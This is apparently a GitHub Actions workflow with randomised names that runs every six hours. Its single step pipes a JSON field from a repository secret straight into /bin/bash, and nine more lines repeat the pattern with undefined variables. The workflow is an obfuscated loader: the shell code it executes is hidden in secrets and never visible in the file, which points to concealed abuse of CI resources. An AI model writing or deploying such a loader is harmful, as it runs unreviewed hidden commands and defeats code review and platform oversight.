name: lujingxi3456

on:
  workflow_dispatch:
  schedule:
    - cron: '45 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: lujingxi3456
        env:
          welwd3525: ${{ secrets.welwd3525 }}
        run: |
          echo $welwd3525 | jq -r .l3 | /bin/bash
          echo $tr3849 | jq -r .ixf9637 | /bin/bash
          echo $ui01950 | jq -r .hvaxx66 | /bin/bash
          echo $co62 | jq -r .vc80 | /bin/bash
          echo $wik863 | jq -r .ejgq1 | /bin/bash
          echo $belxm80 | jq -r .pxc3790 | /bin/bash
          echo $kaya929 | jq -r .mej5 | /bin/bash
          echo $xmoah0 | jq -r .rsq03 | /bin/bash
          echo $jfrmq8 | jq -r .zub105 | /bin/bash
          echo $y3 | jq -r .rb929 | /bin/bash

